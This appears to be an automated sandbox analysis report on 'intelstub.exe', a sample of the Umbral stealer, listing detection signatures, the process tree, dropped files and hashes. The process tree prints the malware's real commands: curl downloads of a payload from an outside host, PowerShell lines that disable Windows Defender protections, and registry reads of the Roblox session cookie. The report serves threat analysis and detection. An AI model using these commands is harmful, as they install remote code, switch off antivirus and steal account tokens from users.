Resubmissions

08-12-2024 02:44

241208-c76qvsykax 10

08-12-2024 02:42

241208-c7bwgstldm 10

08-12-2024 02:40

241208-c6dcxstlal 10

08-12-2024 02:37

241208-c4lxaaxrcv 10

Analysis

  • max time kernel
    99s
  • max time network
    101s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    08-12-2024 02:37

General

  • Target

    intelstub.exe

  • Size

    45KB

  • MD5

    46dad3f34a1ff25b259446bac02cca4a

  • SHA1

    08be9e8701d40bb0d968106793480eeb25adeb26

  • SHA256

    9bf776f889b56b90ef2cbe8cd971c68290f79374b7a7dcfa100e71a1cd45bd03

  • SHA512

    67338468551bc926a88b8e40f40177dea339debd701ad463f9e2cb763cf82f755743f3ee82c3626aa326c820afb93020d0d9526fc38affcb9b3af92725b393f6

  • SSDEEP

    768:R4yvRGAc8gygFxLgkzLQgzcOybPofSzVxsBKfwJlVE3iPmbL52:9c8Oxz8YcO+A6zV4Kfd7

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • cURL User-Agent 2 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Users\Admin\AppData\Local\Temp\intelstub.exe
    "C:\Users\Admin\AppData\Local\Temp\intelstub.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3044
      • C:\Windows\system32\curl.exe
        curl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent
        3⤵
        • Drops file in Windows directory
        PID:4884
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\system32\certutil.exe
        certutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport
        3⤵
          PID:2344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\IME\zvcjd0.pfx
        2⤵
          PID:3864
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\system32\curl.exe
            curl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent
            3⤵
              PID:5012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c start C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1608
            • C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe
              C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4708
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" csproduct get uuid
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4540
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" csproduct get uuid
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:872
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:5044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1132
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4676
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4740
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" os get Caption
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3152
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" computersystem get totalphysicalmemory
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5068
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" csproduct get uuid
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5016
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3620
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious behavior: EnumeratesProcesses
                PID:4552

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3eb3833f769dd890afc295b977eab4b4

          SHA1

          e857649b037939602c72ad003e5d3698695f436f

          SHA256

          c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

          SHA512

          c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          84063c0d1d9aae057e1c424279a859b9

          SHA1

          267a2c5851b5da21dea746f0417dd4b33f051a31

          SHA256

          8efb3b1ffff11a06d7fc95530ea8eb260de51e72cfb457cf10a6fd34c8d20ed8

          SHA512

          ed878d9e9632e0f9ca2a644a86dd142eb91ea74403e5829dd159f225b7230b48314d52f783aff3e80180815f95cb7daebfdc0a89e4d93eb233aebb53ebc7f111

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          e84201584e77775809062c523b612091

          SHA1

          32944b89ab29734ab688a0996b301255c71bce8c

          SHA256

          3178c801eb8d2e9e616f177ab5d4baa653bbb6b44f2725f9dbc3370c674be489

          SHA512

          b071a268d058f3e0956515c08ddc212a0c9469f02f54698b0bf44c654c75b1778d5f47c6ffcd855f8e74b7553070aba3778580d1f12fbe8d706b9ecdf3c02132

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          8e1fdd1b66d2fee9f6a052524d4ddca5

          SHA1

          0a9d0994559d1be2eecd8b0d6960540ca627bdb6

          SHA256

          4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

          SHA512

          5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          71d946f8535e63213c5b7c5a0f41feeb

          SHA1

          54938522f157d789d4f1344656bd943e68ea03f7

          SHA256

          3eef0c05ebd9655d885f994c20cd17b8dd7064118fc8273be1d7085dc4a9aaa6

          SHA512

          48869f761ad6ea639df76c65ea5efa8c16b6f3e6045471f6cfd91791a756c998e73811dd84dc80f9da7ba302b349915b8604bf99ceee20c67d32900f7a07bad1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5igdbjoc.k10.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe

          Filesize

          238KB

          MD5

          66574582c2e810055676407bdd671636

          SHA1

          71a07c0906e65524d6844aa0a65e90ee682eb6c5

          SHA256

          5a05e0c1a7b22baaaa9268ef6f0d9a5524826fdc3871a59c5134f7354baa9346

          SHA512

          04c5dc624009d1127319f0f32c137a4bab6b1aec10e3fd5fdad4372c8a09b8f894980834d6d0d5ee3920ccb3aa3d3e84fe6e1010b6b6dabdb6c20e2f047b5341

        • C:\Windows\IME\zvcjd0.pfx

          Filesize

          2KB

          MD5

          044c6ed5926cda780ca3506829585245

          SHA1

          b958068c7f440fffd712e9a0704f5234537b22d4

          SHA256

          21115f915d5e38fb38be88a627010d39cb7e4b0008854530e3a8fa117f45cfea

          SHA512

          4d00d57e4f0e12c01d5455cf81f685b04b9446aa026b8579009a271dab5eacc298530625e995ff910a9cc6442392fd2098d517b86b7ad0f713f689324e5f0601

        • memory/4708-42-0x000002707E560000-0x000002707E57E000-memory.dmp

          Filesize

          120KB

        • memory/4708-41-0x000002707E700000-0x000002707E750000-memory.dmp

          Filesize

          320KB

        • memory/4708-40-0x000002707F0A0000-0x000002707F116000-memory.dmp

          Filesize

          472KB

        • memory/4708-67-0x000002707E550000-0x000002707E55A000-memory.dmp

          Filesize

          40KB

        • memory/4708-68-0x000002707E5B0000-0x000002707E5C2000-memory.dmp

          Filesize

          72KB

        • memory/4708-15-0x000002707C990000-0x000002707C9D0000-memory.dmp

          Filesize

          256KB

        • memory/5044-16-0x000001B26E720000-0x000001B26E742000-memory.dmp

          Filesize

          136KB